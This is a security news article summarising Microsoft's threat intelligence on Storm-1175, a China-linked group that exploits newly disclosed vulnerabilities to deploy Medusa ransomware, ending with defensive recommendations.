-
Microsoft’s Threat Intelligence team has tied a China-linked hacking group, Storm-1175, to a wave of high-speed ransomware attacks exploiting zero-day and recently disclosed vulnerabilities.
-
Storm-1175 deploys Medusa ransomware within days (sometimes within 24 hours) of breaking into a target’s network.
-
Healthcare, education, finance, and professional services organizations across Australia, the UK, and the US are absorbing the heaviest hits.
A China-linked threat actor is tearing through corporate networks at an alarming pace, and security researchers are sounding the alarm.
Microsoft’s Threat Intelligence team has formally tied Storm-1175 to a calculated campaign that chains zero-day exploits together to breach internet-facing systems and rapidly drop Medusa ransomware before most organizations can even respond.
Microsoft’s researchers described the group’s approach bluntly, noting that Storm-1175’s “high operational proficiency and tempo in identifying leaked perimeter assets” has made it particularly dangerous to healthcare organizations, as well as those in education, professional services, and finance across Australia, the United Kingdom, and the United States.
Storm-1175 Burns Through Exploits Faster than Patches Ship
Storm-1175 does not wait around. The group consistently targets vulnerabilities during the dangerous window between public disclosure and when organizations finally apply the available patch.
Microsoft warned that the group “rotates exploits quickly during the time between disclosure and patch availability or adoption, taking advantage of the period where many organizations remain unprotected.”
Since 2023, Microsoft has linked Storm-1175 to the exploitation of more than 16 vulnerabilities across widely used platforms. These include flaws in Microsoft Exchange Server, Ivanti Connect Secure, JetBrains TeamCity, ConnectWise ScreenConnect, CrushFTP, SimpleHelp, BeyondTrust, and SmarterTools SmarterMail; among others. Two of those vulnerabilities, CVE-2025-10035 and CVE-2026-23760, Storm-1175 were actively exploited as zero-days before researchers had even publicly disclosed them.
The group has also been expanding its reach. As of late 2024, Storm-1175 began targeting Linux systems, hitting vulnerable Oracle WebLogic instances across multiple organizations. The exact vulnerability it used in those attacks remains unconfirmed.
In select cases, the group chains multiple exploits together (such as the OWASSRF exploit chain) to deepen post-compromise access. Storm-1175 does not simply break in and sit still. It moves fast and hits hard.
Inside the Playbook: How Storm-1175 Moves Once It’s in
Once Storm-1175 establishes a foothold inside a network, it wastes no time. The group creates new user accounts to maintain persistence, deploys web shells, and installs legitimate remote monitoring and management software (tools like Atera, AnyDesk, ConnectWise ScreenConnect,MeshAgent, and SimpleHelp) to blend malicious activity into trusted, encrypted traffic and reduce the chance of detection.
From there, Storm-1175 moves laterally using living-off-the-land binaries including PowerShell and PsExec, along with Impacket. It also leverages PDQ Deployer to push both lateral movement tools and ransomware payloads across the network.
To ensure Medusa lands cleanly, the group modifies Windows Firewall policies to enable Remote Desktop Protocol access and deliberately configures Microsoft Defender Antivirus exclusions so it does not flag or block the ransomware payload.
Storm-1175 then runs credential-dumping tools (Mimikatz and Impacket) to harvest account data before it begins scooping up files. The group uses Bandizip to collect and compress stolen data, then Rclone to exfiltrate everything out.
From initial access to full ransomware deployment, the entire operation can wrap up within a few days. In the most aggressive cases, Storm-1175 has completed the full attack chain in under 24 hours.
This speed is reminiscent of the Cisco firewall exploitation, where attackers used a vulnerability for weeks before a patch was released, proving that whether it’s hours or weeks, every moment of delay in patching gives attackers the advantage.
Why this Threat is Bigger than One Hacking Group
Storm-1175’s playbook reveals a broader and deeply concerning shift in how threat actors operate. RMM tools, software that organizations legitimately use for IT management, are quietly becoming dual-use weapons.
Storm-1175 exploits the trusted, encrypted nature of these platforms to hide malicious traffic in plain sight, making detection significantly harder for security teams.
The financially motivated group is not slowing down. Organizations running unpatched internet-facing systems, particularly in healthcare and finance, remain Storm-1175’s most accessible targets.
Patching fast, restricting user privileges, monitoring for UAC bypass attempts, and treating unexpected RMM activity as a red flag are no longer optional precautions; they are urgent necessities.
